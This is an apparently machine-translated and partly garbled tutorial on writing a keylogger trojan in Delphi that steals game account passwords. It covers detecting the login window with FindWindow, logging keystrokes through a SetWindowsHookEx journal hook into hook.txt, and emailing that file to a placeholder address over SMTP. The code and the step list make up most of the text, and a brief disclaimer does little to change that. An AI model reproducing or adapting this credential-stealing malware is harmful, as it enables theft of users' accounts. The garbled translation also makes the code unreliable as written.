Trojan plug-in roof plug-in, maybe mostly like Trojans, is the Southam Side East that helps do plug-in accounts and passwords. Because there is such an external existence on the network, I have to say today (I personally hate this plug-in, please see this technology, thank you for your cooperation). To do this plug-in program implementation method (such as Hook, Keyboard Monitoring and other technologies), because Hook technology is relatively high for programmers and needs more dynamic link libraries in practical applications, I will take them in the text. Keyboard monitoring technology to achieve this type of Trojan. Keyboard monitoring technology only needs one .exe file to achieve background keyboard monitoring, this program is more suitable for this technology. We must understand the idea of the program before making a program: 1. Let's first know that you want to record the name of the login window. 2. Judging whether the login window appears. 3. If the login window appears, log the keyboard. 4. When the window is closed, the record information is sent to the programmer's mailbox. I don't have a specific analysis of the first point, because you have to know what game you play, what is the name of the login window. From the second point, let's start this type of plug-in program implementation: So how do we judge whether the login window does not appear? In fact, this is very simple, we can easily implement the FindWindow function:
HWnd FindWindow (lpctstr lpclassname, // pointer to class namelpctstr lpwindowname // pointer to window name);
In the actual program implementation, we have to find the 'XX' window, use FindWindow (NIL, 'XX') if the window has appeared when the return value is greater than 0, then we can record the keyboard information. First, we use the SETWINDOWSHOKEX to set up the monitoring log, and the usage of this function is as follows:
HHOOK SetWindowsHookEx (int idHook, // type of hook to installHOOKPROC lpfn, // address of hook procedureHINSTANCE hMod, // handle of application instanceDWORD dwThreadId // identity of thread to install hook for);
Here to explain here, in our program, we have to do this to HookProc, we must implement it by writing a function, Hinstance here we can use this program directly, the specific implementation method is:
HHOOK: = SETWINDOWSHOKEX (WH_Journal, Hinstance, 0);
And the functions in hookproc are complex:
Function hookProc (Icode: wparam; lparam: lparam): LRESULT; stdcall; begin if FindedTitle1 file: // If the window is discovered BeGin if (peventmsg (lparam) ^. Message = WM_KeyDown) THEN File: // Message is equal to keyboard Press hookkey: = hookkey form1.keyhookresult (peventmsg (lparam) ^. Paraml, peventmsg (lparam) ^. Paramh); file: // through key /OokResult The parameter is the button name. I will convert the message in the end of the document. If Length> 0 THEN FILE: // If you get the key name begin write (hookkeyfile, hookkey); file: // write the button name to the text file hookkey: = '; end; end; end; or more is record The entire process of the keyboard, simple, if you record it, don't forget to release it, UnHookWindowshookex (HHOOK), and hHOOK, the handle returned after setting SetWindowsHookex. We have got a record of the keyboard, so now, just send the recorded information back, we have caused it. Other sends this piece is not very difficult, just read the record from the text file, I will send it to the email component comes with Delphi. code show as below:
Assignfile (readfile, 'hook.txt'); file: // Open hook.txt This text file reset (retadfile); file: // Set to a way to read how much not Eof (readfile) do file: // Read the document begin readln (readfile, s, j); file: // read file line body: = body s; end; final: // turn off file end; nmsmtp1.encodettype: = UUMIME; file: // Set the encoded nmsmtp1.postMessage.attachments.text: = '; file: // Set attachment nmsmtp1.postMsSage.Fromaddress: =' xxx@xxx.com '; file: // Set source mail address NMSMTP1 .PostMessage.toaddress.text: = 'xxx@xxx.com'; / Set the target email address nmsmtp1.postMessage.body.text: = 'password' '' body; file: // Set the mail content nmsmtp1.postMessage. Subject: = 'password'; file: // Set the message title nmsmtp1.sendmail; file: // Send a message
All functions of this program have been implemented and edited.
